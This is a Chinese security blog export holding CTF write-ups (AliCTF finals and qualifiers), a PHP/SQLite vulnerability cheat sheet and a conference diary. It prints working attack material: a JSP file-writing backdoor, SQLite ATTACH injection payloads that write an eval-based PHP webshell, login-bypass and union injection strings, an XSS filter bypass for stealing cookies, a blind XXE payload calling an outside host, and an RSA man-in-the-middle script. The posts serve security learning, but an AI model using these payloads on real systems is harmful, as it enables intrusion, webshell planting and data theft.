id="toc_2">0x02 Java NPC</h4> <p class="md_block"> <span class="md_line">Java自己本不了解很多,第一天研究了下Java NPC的第一道题目,绕来绕去居然顺利拿下First Blood.</span> </p> <p class="md_block"> <span class="md_line">Java Npc首先是一个上传绕过,上传文件大小不得超过106个字节,且限制某些后缀不能上传.这里使用大写JSP即可上传得到JSP脚本执行,框架为Jetty.后来kxlzx前辈提到题目本意是要下载Jetty分析其他后缀而非大小写转换</span> </p> <pre><code> &lt;servlet-mapping&gt; &lt;servlet-name&gt;jsp&lt;/servlet-name&gt; &lt;url-pattern&gt;*.jsp&lt;/url-pattern&gt; &lt;url-pattern&gt;*.jspf&lt;/url-pattern&gt; &lt;url-pattern&gt;*.jspx&lt;/url-pattern&gt; &lt;url-pattern&gt;*.xsp&lt;/url-pattern&gt; &lt;url-pattern&gt;*.JSP&lt;/url-pattern&gt; &lt;url-pattern&gt;*.JSPF&lt;/url-pattern&gt; &lt;url-pattern&gt;*.JSPX&lt;/url-pattern&gt; &lt;url-pattern&gt;*.XSP&lt;/url-pattern&gt; &lt;/servlet-mapping&gt;</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">可以上传文件后,发现UP目录可以列文件,先传了一个index.html.105字节的jsp脚本纠结了一段时间.后来这样解决:</span> </p> <p class="md_block"> <span class="md_line">首先传一个脚本获取当前路径</span> </p> <pre><code>/tmp/webapp</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">而后修改这样一个后门</span> </p> <pre><code>&lt;%(new java.io.FileOutputStream("/tmp/webapp/up/xx.JSP")).write(request.getParameter("t").getBytes());%&gt;</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">客户端写个HTML</span> </p> <pre><code>&lt;form action="http://xxxx/up/xxxx.JSP" method="post"&gt; &lt;textarea name=t cols=120 rows=10 width=45&gt;your code&lt;/textarea&gt;&lt;BR&gt;&lt;center&gt;&lt;br&gt; &lt;input type=submit value="提交"&gt; &lt;/form&gt;</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">上传其他后门,接下来就是翻来翻去找到flag.顺利拿到一血.</span> </p> <p class="md_block"> <span class="md_line">Java后门的题目完成了一半,自己也一知半解,不多做记录.</span> </p> <h4 id="toc_3">0x03 小结</h4> <p class="md_block"> <span class="md_line">AliCTF决赛题目深度较高,感谢主办方,更感谢一起玩耍的队友.</span> </p> <p class="md_block"> <span class="md_line">最后,关于大四与工作,留个纪念:</span> </p> <pre><code>awk -F '=' '/\[F2\]/{a=1}a==1&amp;&amp;$1~/A1/{print a;}' conf.ini</code></pre> <!--block_code_end--> PHP/Sqlite下常见漏洞浅析 - PHP/Sqlite Vulnerability Cheat Sheet 2014-10-08T16:00:00Z post/php-sqlite-vulnerability-cheatsheet Sword Soul <h3 id="toc_0">0x00 前言</h3> <p class="md_block"> <span class="md_line">SQLite作为一款轻型数据库,PHP开发人员一定不会陌生,PHP5后,其已默认集成这个轻巧的内嵌式数据库产品.对于采用PHP/Sqlite的CMS,也存在一些常见的安全威胁.笔者以下数例加以分析,欢迎指出不足与错误之处.</span> </p> <h3 id="toc_1">0x01 数据库下载</h3> <p class="md_block"> <span class="md_line">作为一个单文件的轻型数据库,存在与类似Access的问题,即数据库下载.在测试的几个CMS中,便存在固定/默认数据库名/地址的问题,可下载造成安全威胁.</span> </p> <p class="md_block"> <span class="md_line">而某些CMS即使设置有数据库随机文件名,但仍存在安全威胁,如XiaoCMS</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/sqlite-01.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">看似防下载的#%使用URL编码即可绕过,而由于短文件名漏洞的存在,随机文件名也不再安全,只需猜解0-9a-f的4位组合即可下载数据:</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/sqlite-02.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">借鉴于Access的数据库防护手法,部分CMS将数据库后缀修改为php,并创建表&quot;create table &#39;&lt;?php&#39; (a); &quot;,以期防下载,但也引入了新的安全威胁.</span> </p> <h3 id="toc_2">0x02 数据库GetShell</h3> <p class="md_block"> <span class="md_line">首先是Akcms,其Sqlite版本数据库后缀为php,但连&#39;&lt;?php&#39;表也没有添加,只要得到(猜解)六位数据库文件名即可GetShell.以下为插入phpinfo();示例</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/sqlite-03.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">而稻草人CMS虽加入了&#39;&lt;?php&#39;表,但在PHP并未抛出错误,仍可下载数据库内容.</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/sqlite-04.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">稻草人在前台使用strip_tags()函数过滤了输入变量,避免了直接GetShell.但通过数据库下载破解管理密码,后台亦可任意编辑文件,造成相应的安全威胁.</span> </p> <h3 id="toc_3">0x03 注入语法</h3> <p class="md_block"> <span class="md_line">为方便测试,写有如下PHP脚本</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/sqlite-05.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">连接数据库文件sqlite.db内容如下:</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/sqlite-06.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">可以看到id输入未经任何过滤,可被我们利用,一个Demo如下:</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/sqlite-07.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">正常id输入1-3均可返回对应的name,而通过注入语句:</span> </p> <p class="md_block"> <span class="md_line">4 union select user,pass,id from user where id=1;</span> </p> <p class="md_block"> <span class="md_line">可通过union查询到id为1的pass值.</span> </p> <p class="md_block"> <span class="md_line">与MySQL5.x类似的,Sqlite存在与information_schema类似的一个表,默认并不显示,名为sqlite_master,表中的字段有type,name,tbl_name,rootpage,sql,比较有价值的是sql字段.</span> </p> <p class="md_block"> <span class="md_line">首先测试有回显处为2</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/sqlite-08.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">查询sql字段内容</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/sqlite-09.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">如上可以得到表结构</span> </p> <p class="md_block"> <span class="md_line">此外,常见的一些语法也与Mysql类似如:</span> </p> <pre><code>注释符: -- 连接符: || Substring: substr(a,b,c) 长度: length(x)</code></pre> <!--block_code_end--> <h3 id="toc_4">0x04 注入GetShell</h3> <p class="md_block"> <span class="md_line">Sqlite中通过Attach语句可以附加数据库(若不存在则创建文件),通过此语句可借助Sqlite注入GetShell,但上面的数据库查询语句:</span> </p> <pre><code>$db-&gt;query($sql);</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">是无法Attach创建文件的</span> </p> <p class="md_block"> <span class="md_line">以下GetShell环境,测试创建Sqlite3数据库</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/sqlite-10.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">修改语句如下:</span> </p> <pre><code>&lt;?php if (isset($_GET['id'])){ $id=$_GET['id']; } else { echo "id!"; exit; } $db = new PDO('sqlite:sqlite3.db'); $sql="select * from user where id=$id"; echo "&lt;h4&gt;Sql: ".$sql."&lt;/h4&gt;"; var_dump(@$db-&gt;exec($sql));</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">此时即可借助注入语句插入WebShell</span> </p> <p class="md_block"> <span class="md_line">测试语句1:</span> </p> <pre><code>4;ATTACH DATABASE 'C:\\wamp\\www\\le4f.php' AS pwn;CREATE TABLE pwn.exp(dataz text);INSERT INTO pwn.exp(dataz) VALUES('&lt;?php phpinfo();?&gt;');--</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/sqlite-11.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">得到phpinfo</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/sqlite-12.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">写入一个WebShell:</span> </p> <pre><code>4;ATTACH DATABASE 'C:\\wamp\\www\\shell.php' AS pwn;CREATE TABLE pwn.exp(dataz text);INSERT INTO pwn.exp(dataz) VALUES('&lt;? eval($_GET['cmd']); ?&gt;');--</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/sqlite-13.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/sqlite-14.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">PHP调用Sqlite还有多种方式,猜想execute和exec方式均有可能GetShell.对于Sqlite2数据库,如下代码:</span> </p> <pre><code>$db = new PDO('sqlite2:sqlite.db'); $db-&gt;exec($sql);</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">可以注入语句Attach创建空文件,但未能插入数据.各位看官如有研究还望指点一二.</span> </p> <h3 id="toc_5">0x05 小结</h3> <p class="md_block"> <span class="md_line">与Access数据库类似,Sqlite轻巧方便的同时,也存在很多可利用的威胁,对开发者来讲也是要注意的问题.以上仅为笔者所观的冰山一角,更多问题由看官去研究发现.</span> </p> <p class="md_block"> <span class="md_line">首发<a class="md_compiled" href="http://www.91ri.org/10983.html">网络攻防实验室</a>,未授权勿转载.</span> </p> ISC2014互联网安全大会见闻 - ISC2014 Participant 2014-09-30T16:00:00Z essay/isc2014-participant Sword Soul <p class="md_block"> <span class="md_line">先恭祝祖国生日快乐</span> </p> <p class="md_block"> <span class="md_line">上周AliCTF打完不久,正好被邀去ISC攻防挑(表)战(演)赛,就带上小伙伴们一起去ISC围观.</span> </p> <p class="md_block"> <span class="md_line">ISC,全称应该是&quot;亚太信息安全领域最权威的年度峰会——2014中国互联网安全大会(ISC 2014)&quot;,会议规模大,现场布置也蛮豪华,可见数字在其上投入不少精力.</span> </p> <p class="md_block"> <span class="md_line">逛了两天,内容就不多做记录.大会基本是围观下,找找朋友聊聊天,吃吃饭,唯一完整听的应该是美首任国土安全部部长Tom Ridge的Speak,没有翻译还是忍不住犯困.</span> </p> <p class="md_block"> <span class="md_line">24日下午表演赛还蛮有趣,走运拿了点名次坐等奖金.之后就是围观展台活动,认识了J神,又围观其破解售货机..送我瓶饮料可好?之后两天时间倒把国家会议中心旁地铁站下店铺逛了遍,附近可以吃饭的地方够捉急,想想也是醉了.总之几天蛮愉快,也留下挺深的回忆,哦对了,帝都打车有点让人心碎;-)</span> </p> <p class="md_block"> <span class="md_line">路还有很远,博学笃行,藏器于身.</span> </p> [CTF]AliCTF-Quals-2014-L-WriteUp 2014-09-24T16:00:00Z writeup/-ctf-alictf-quals-2014-l-writeup Sword Soul <p class="md_block"> <span class="md_line">::L Team:: <a class="md_compiled" href="http://l-team.org/">http://l-team.org</a></span> </p> <hr> <h4 id="toc_0">0x00 Trend</h4> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-trend.png" alt="img" title="" ></span> </p> <h4 id="toc_1">0x01 BigData</h4> <h5 id="toc_2">BigData-100</h5> <blockquote> <p class="md_block"> <span class="md_line">一名员工通过内网web服务入侵了某台服务器,植入了webshell。<br /></span> <span class="md_line"> 现在需根据该台服务器的web访问日志确认webshell事件id行数并取和。<br /></span> <span class="md_line"> 例如日志中有问题的事件id行数分别为 1、3、19,那么flag即为 23 。<br /></span> <span class="md_line"> 题目下载地址:点击下载</span> </p> </blockquote> <p class="md_block"> <span class="md_line">前期判断不同的UA和URL,统计请求次数找到一个奇怪的access4.jsp,提交不对,正常是aspx,又grep了下是否有php,发现有php记录,剔除bot,发现plus的shell:config1.php</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-big-100-01.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">要计算和,写了个简单的脚本</span> </p> <pre><code>a=0 while read var do a=`expr $a + $var` done echo $a</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-big-100-02.png" alt="img" title="" ></span> </p> <hr> <h5 id="toc_3">BigData-200</h5> <blockquote> <p class="md_block"> <span class="md_line">Alice和Bob通过一台代理服务器使用某种协议进行通信,而黑客Mallory攻击了这台服务器,Mallory可以截取到所有Alice和Bob发送的消息。<br /></span> <span class="md_line"> Mallory截取某一方发送的消息后,他可把消息直接转发给另一方,也可以伪造一条消息发给另一方。<br /></span> <span class="md_line">听说最近Alice会向Bob汇一笔钱,可是Alice并不知道Bob的银行账号,所以Alice决定通过代理服务器询问Bob。Mallory产生了邪恶的想法,他希望Alice把钱都汇到他的银行账号mallory@mallory.com上。<br /></span> <span class="md_line">wiki链接Mallory正要凑钱去参加AliCTF,你能帮帮他么?<br /></span> <span class="md_line"> connect data200.alictf.com 30000<br /></span> <span class="md_line"> hint: wiki链接 </span> </p> </blockquote> <p class="md_block"> <span class="md_line">连接服务器,观察到双方通信内容(均按2或1进行直接转发):</span> </p> <pre><code>Alice said: Hey,Bob! Bob said: Yes Alice said: Let's encrypt with rsa,my public key is (11316499 , 65537) Bob said: OK,my public key is (9204067 , 65537)</code></pre> <!--block_code_end--> <p class="md_block md_has_block_below md_has_block_below_blockquote"> <span class="md_line">接着就是被加密的信息,继续转发两次后gameover退出.<br /></span> <span class="md_line">从观察到的通信内容可以得知:</span> </p> <blockquote> <p class="md_block"> <span class="md_line">1、双方使用了RSA来加密通信内容</span> </p> <p class="md_block"> <span class="md_line">2、双方使用的RSA公钥的N很小,可以被分解,从而得到私钥</span> </p> </blockquote> <p class="md_block"> <span class="md_line">破解出双方的RSA私钥可以得到后续通信内容:</span> </p> <pre><code>Alice said: What's your account? Bob said: My account is bob@bob.com</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">根据题目意思,替换了Bob的邮箱为mallory@mallory.com(这里吐槽下大小写敏感)然后用Alice公钥加密后发回去.</span> </p> <p class="md_block"> <span class="md_line">原本以为可以拿key走人了,结果又收到一段来自Alice的新信息,拿刚才破解出的Bob私钥解密后得到:</span> </p> <pre><code>Alice said: Let's encrypt with rsa,my public key is (8965793 , 65537)</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">看起来发生了新一轮的公钥交换,于是按2转发,结果直接gameover.</span> </p> <p class="md_block"> <span class="md_line">尝试后发现这里只有按4修改后转发才行,把第一轮收到的公钥交换信息发回去吧,信息操作过程如下:</span> </p> <pre><code>Alice said: Let's encrypt with rsa,my public key is ( 8965793 , 65537 ) (drop by mallory) Mallory said: Let's encrypt with rsa,my public key is ( 12137569 , 65537 ) Bob said: OK,my public key is ( 11316499 , 65537 ) (drop by mallory) Mallory said: OK,my public key is ( 11316499 , 65537 )</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">接着拿新交换的公钥解出新私钥,再解出接下来的明文:</span> </p> <pre><code>Alice said: What's your account? Bob said: My account is bob@bob.com</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">于是用老方法替换邮箱,本以为这下可以拿key了,结果又出来一个新的公钥交换过程...</span> </p> <p class="md_block"> <span class="md_line">总结下得到的信息,可以推测出协议流程大概是这样的:</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-big-200-01.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">...</span> </p> <p class="md_block"> <span class="md_line">可以推测协议结束后应该会产生包含flag信息的内容.</span> </p> <p class="md_block"> <span class="md_line">每轮公钥交换大致如下,这是第二轮到第三轮的密钥交换</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-big-200-02.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">因此可以设计出能够攻破该协议的MITM攻击.</span> </p> <p class="md_block"> <span class="md_line">攻击过程通项为</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-big-200-03.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">根据攻击过程写出攻击脚本,逐步试验公钥交换轮数N的大小,最后可以知道N=50,flag在其后以明文消息的方式给出</span> </p> <p class="md_block"> <span class="md_line">脚本如下:</span> </p> <pre><code>import socket import math from string import * def exeuclid(a,b): if b == 0: return 1 , 0 , a; else: x,y,q = exeuclid(b,a%b); x,y = y,(x-a/b*y); return x,y,q; def getpq(x): for i in xrange(2, int(math.sqrt(x))+1): if x % i == 0: return i, x/i def getprikey(e,n): p, q=getpq(n) d,x,y=exeuclid(e,(p-1)*(q-1)) if d&lt;0: d=(p-1)*(q-1)+d return d, n def decrypt(c,d,n): m=pow(c,d,n) return m def encrypt(m,e,n): c=pow(m,e,n) return c def reciveanddecrypt(key=()): s = sock.recv(1024) s = split(s,'\n')[2] s = s[5:len(s)-3] cl = s.split(',') s1='' for x in cl: if key == (): s1 = s1 + chr(int(x)) else: s1 = s1 + chr(decrypt(int(x),key[0],key[1])) return s1 def encryptandsend(msg,n): s1='Start' for x in msg: s1 = s1+str(encrypt(ord(x),65537,n))+',' s1=s1[:len(s1)-1]+'End' sock.send(s1) print 'Mallory said:', msg return 0 sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect(('data200.alictf.com', 30000)) #--init-- s = sock.recv(1024) s = split(s,'\n')[8] s = s[5:len(s)-3] cl = s.split(',') s1='' for x in cl: s1 = s1 + chr(int(x)) print 'Alice said:', s1 sock.send('2') s = sock.recv(1024) s = split(s,'\n')[2] s = s[5:len(s)-3] cl = s.split(',') s1='' for x in cl: s1 = s1 + chr(int(x)) print 'Bob said:', s1 sock.send('1') #first rsa key exchange print 'No. ', 1,' RSA public key exchange' s1 = reciveanddecrypt() print 'Alice said:', s1 s1_bak = s1[:] #preserve Alice's first rsa key message for later use s1 = s1[41:len(s1)-2] n1=int(split(s1,',')[0]) prikey1=getprikey(65537,n1) #calculate Alice's private key sock.send('2') #send it to Bob s2 = reciveanddecrypt() print 'Bob said:', s2 s2_bak = s2[:] #preserve Bob's first rsa key message for later use s2 = s2[21:len(s2)-2] n2=int(split(s2,',')[0]) prikey2=getprikey(65537,n2) #preserve Bob's first rsa key message for later use sock.send('1') #send it to Alice s1 = reciveanddecrypt(prikey2) print 'Alice said:', s1 sock.send('2') s1 = reciveanddecrypt(prikey1) print 'Bob said:', s1,' (drop by mallory)' msg='My account is mallory@mallory.com' #mallory@mallory.com sock.send('3') encryptandsend(msg,n1) nn1 = n1 nn2 = n2 for i in xrange(49): #second and another rsa key exchange print 'No. ', i+2,' RSA public exchange' s1 = reciveanddecrypt(prikey2) print 'Alice said:', s1,' (drop by mallory)' sock.send('4') #send Alice's old public key to Bob encryptandsend(s1_bak,nn2) #use Bob's old public key to encrypt s2 = reciveanddecrypt(prikey1) print 'Bob said:', s2,' (drop by mallory)' sock.send('3') #send Bob's old public key to Alice encryptandsend(s2_bak,nn1) #use Alice's old public key to encrypt s1 = s1[41:len(s1)-2] nn1=int(split(s1,',')[0]) nprikey1=getprikey(65537,nn1) #calculate Alice's new private key s2 = s2[21:len(s2)-2] nn2=int(split(s2,',')[0]) nprikey2=getprikey(65537,nn2) #calculate Bob's new private key s1 = reciveanddecrypt(prikey2) #use Alice's old private key to decrypt print 'Alice said:', s1,' (drop by mallory)' sock.send('4') encryptandsend(s1,nn2) #use Bob's new public key to encrypt s1 = reciveanddecrypt(prikey1) #use Bob's old private key to decrypt print 'Bob said:', s1,' (drop by mallory)' msg='My account is mallory@mallory.com' #mallory@mallory.com sock.send('3') encryptandsend(msg,nn1) #use Alice's new public key to encrypt print sock.recv(1024) sock.close()</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">ps:事实上,还存在着其他攻击方式,如先生成一个公-私钥对,在第一轮公钥交换的时候即以自己的公钥去替换二者的公钥,就可以省去破解私钥以观察二者通信流量过程.可惜的是,由于题目程序的限制,若在第一轮公钥交换的时候使用3和4来替换流量,则会直接gameover.</span> </p> <hr> <h4 id="toc_4">0x02 WEB-A</h4> <h5 id="toc_5">WebA-100</h5> <blockquote> <p class="md_block"> <span class="md_line">从登录开始吧<br /></span> <span class="md_line">hint:手注帝在哪里?<br /></span> <span class="md_line">http://web100a.alictf.com/fbdd6257b154b33dc977839c3cde7d79.php </span> </p> </blockquote> <p class="md_block"> <span class="md_line">Youtube提示,打开看到绕过依靠</span> </p> <pre><code>' '-0||' ' AND pass=xxx</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">群里又说不超过10位的普通万能密码,试了下这样bypass了</span> </p> <pre><code>' || 1=1 ||'</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-weba-100-01.png" alt="img" title="" ></span> </p> <hr> <h5 id="toc_6">WebA-200</h5> <blockquote> <p class="md_block"> <span class="md_line">Casper写了一个xss内联事件的防御脚本,你能绕过他发送给管理员获取管理员的cookie吗? <br /></span> <span class="md_line"> http://web200a.alictf.com/9ad626cab2d2d7309626e1a1ec9c1c41.php </span> </p> </blockquote> <pre><code>function hookEvent(onevent) { document.addEventListener(onevent.substr(2), function(e) { var element = e.target; var flags = element['_flag']; if (!flags) { flags = element['_flag'] = {}; } if (typeof flags[onevent] != 'undefined') { return; } flags[onevent] = true; if (element.nodeType != Node.ELEMENT_NODE) { return; } var code = element.getAttribute(onevent); if (code &amp;&amp; chkxss(code)) { console.log("xss"); element[onevent] = null; } }, true); } function chkxss(code){ try{ decodecode = decodeURIComponent(code); }catch(e){ decodecode = code; } var xsses = ["fromCharCode","join","concat","slice","substr","match","split","escape","encodeURI","replace","\\","eval","setTimeout","setInterval","getScript","constructor","erHTML","Attribute","unction","execScript","with","setImmediate","createElement","write","name","referer","cookie","location","click"]; for(i=0;i&lt;xsses.length;i++){ if(decodecode.indexOf(xsses[i])&gt;-1){ return true; } } if(/(&amp;&amp;)|;|,|\[/.test(decodecode)&amp;&amp;decodecode.indexOf("+")&gt;-1){ return true; } if((decodecode.indexOf("URL")&gt;-1||decodecode.indexOf("hash"))&gt;-1&amp;&amp;location.href.indexOf("#")&gt;-1){ return true; } if(code.length&gt;150){ return true; } if(decodecode.indexOf('open')&gt;-1||/\Wsrc\W/.test(decodecode)){ return true; } return false; } for (var k in document) { if (/^on/.test(k)) { hookEvent(k); } }</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">一个前端过滤器,搜索可以看到类似的Demo.基于黑名单过滤,可以绕过.代码中并没有拦截decodeURIComponent,可以编码绕过.<br /></span> <span class="md_line">之前有个try语句:</span> </p> <pre><code>try{ decodecode = decodeURIComponent(code); }catch(e){ decodecode = code; }</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">传入code被解码一次.对其二次编码即可绕过,也可code中加入%xx等不可解码字符,使decodeURIComponent出错,catch处理不进行urldecode.</span> </p> <p class="md_block"> <span class="md_line">对eval也使用decodeURIComponent,在全局的函数默认是window成员,可用</span> </p> <pre><code>window[decodeURIComponent('%65val')]()</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">绕过过滤</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-weba-200-01.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">将其再次URL编码访问收到Cookie.</span> </p> <pre><code>web200aflag=ALICTF{b6daff2073c78dabe09f22ac33f53823}</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">这里有个小插曲,提交后xss收信得到flag提交错误,这时自己本地测试发现自己客户端莫名其妙多出一个web200aflag,得知题目此时修改过,之后再次收信得到新flag.</span> </p> <hr> <h5 id="toc_7">WebA-300</h5> <blockquote> <p class="md_block"> <span class="md_line">就是让你看不见 <br /></span> <span class="md_line">http://web300a.alictf.com/48f70e5ec569b7dec86bf9e35212c7f2.php </span> </p> </blockquote> <p class="md_block"> <span class="md_line">开始感觉是XXE,回博客温习了下,试了一些Payload都没反应,无解.</span> </p> <p class="md_block"> <span class="md_line">后来搜下Blind XXE,看到Black-Hat 13年有个Report,后搜索到这个博客</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><a class="md_compiled" href="http://hivesec.net/web-security/%E5%85%B3%E4%BA%8Eblind-xxe.html">http://hivesec.net/web-security/%E5%85%B3%E4%BA%8Eblind-xxe.html</a></span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-weba-300-01.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">又得到Wooyun上鲜果网的一个实现,测试</span> </p> <pre><code>&lt;?xml version="1.0" encoding="UTF-8"?&gt; &lt;!DOCTYPE root [ &lt;!ENTITY % remote SYSTEM "http://xxx/xxe/flag.xml"&gt; %remote; ]&gt;</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">看到日志了,用file://读不到文件,以php://filter读,请求写的一个log.php</span> </p> <pre><code>&lt;?php $log=$_GET['c']; file_put_contents('233.txt',$log); ?&gt;</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-weba-300-02.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">解码得到flag</span> </p> <hr> <h5 id="toc_8">WebA-400</h5> <blockquote> <p class="md_block"> <span class="md_line">Casper刚学了点黑客技术,就想找个站点练练手,发现一个页面好奇怪,你能帮他一探究竟嘛? <br /></span> <span class="md_line"> hint:看看目录有啥?<br /></span> <span class="md_line"> 不光要看目录有什么,想要更多信息也要多看看Github哦。<br /></span> <span class="md_line"> 请按照x64的方式去思考做题。<br /></span> <span class="md_line"> http://web400a.alictf.com/f3f4d762e85fa426dd926629bff7788b.php </span> </p> </blockquote> <p class="md_block"> <span class="md_line">请求页面抓包,可以看到Upload表单</span> </p> <pre><code>&lt;form action="http://web400a.alictf.com/f3f4d762e85fa426dd926629bff7788b.php" method="post"enctype="multipart/form-data"&gt; &lt;label for="file"&gt;hi&lt;/label&gt;&lt;br /&gt; &lt;input type="file" name="file" id="file"&gt; &lt;input type="submit" name="submit" value="Submit"&gt; &lt;/form&gt;</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">随便上传一个文件,问是否存在这个文件,并给出地址(当前时间:年月日时分秒)如20140921154012.php,当然手工请求是404了,猜想可能上传后被删掉,测试脚本一直检查果然是这样.</span> </p> <p class="md_block"> <span class="md_line">使用Burp开Instruder持续发包请求,然后写脚本查看返回:</span> </p> <pre><code>#!/usr/bin/python import time import requests while 1: url = "http://web400a.alictf.com/upload/upload/" now = time.strftime('%Y%m%d%H%M%S',time.localtime(time.time())) url = url + str(now) + ".php" res = requests.get(url) print res.status_code if res.status_code == 200: print res.text time.sleep(0.3)</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">读取到题目页面内容</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-weba-400-01.png" alt="img" title="" ></span> </p> <pre><code>&lt;? php header("Location:http://security.alibaba.com"); if($_FILES["file"]["error"] &gt; 0){ echo "Error: " . $_FILES["file"]["error"] . "&lt;br&gt;"; }else{ $name = date('YmdHis'); $uploaddir = '/home/wwwroot/default/upload/upload/'; $uploadfile = $uploaddir . $name . '.php'; if(move_uploaded_file($_FILES["file"]["tmp_name"], $uploadfile)){ echo "upload/upload/". $name . ".php file Exist?"; }else{ echo ""; } sleep(3); # unlink($uploadfile); } ?&gt; \&lt;!-- @author:nidongde \--&gt; &lt;form action="f3f4d762e85fa426dd926629bff7788b.php" method="post"enctype="multipart/form-data"&gt; &lt;label for="file"&gt;hi&lt;/label&gt;&lt;br /&gt; &lt;input type="file" name="file" id="file"&gt; &lt;input type="submit" name="submit" value="Submit"&gt; &lt;/form&gt;</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">LNMP环境,读到PHP.ini,禁用很多函数,不过可以列目录读文件就够了,读文件用readfile,列目录用</span> </p> <pre><code>&lt;?php $dir = opendir('./../');while (($file = readdir($dir)) !== false){ echo $file.'&lt;br /&gt;';}closedir($dir);?&gt;</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">在上一层upload目录读到别家孩子的shell,以及持续删文件的lalala.py脚本,连上shell在网站根目录下载到一个压缩包,根据时间判断不是熊孩子在作怪</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-weba-400-02.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">下载后解压又需要密码,试了几个无果就放一边了,第二天看到Hint,说目录以及Github,正好web400b的日志里有很多目录,对比尝试后找到这个奇葩账号</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-weba-400-03.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">以为是key,提交为错,想起是解压密码,解压文件,得到一个index.php源码和.DS_Store.(出题人压缩软件一定没设置好...建议你使用BetterZip ;)</span> </p> <pre><code>&lt;?php foreach($_REQUEST as $key =&gt; $value){ if(eregi('^(_COOKIE|GLOBALS|_GET)', $key) || strlen($key) &lt;= 0){ exit('error'); }else{ foreach(Array('_GET', '_POST', '_COOKIE') as $_REQUEST){ var_dump($key); foreach($$_REQUEST as $key =&gt; $value){ var_dump($value); $value['alibaba']['security'] = (int)$value['alibaba']['security']; echo $value['alibaba']['security']; echo 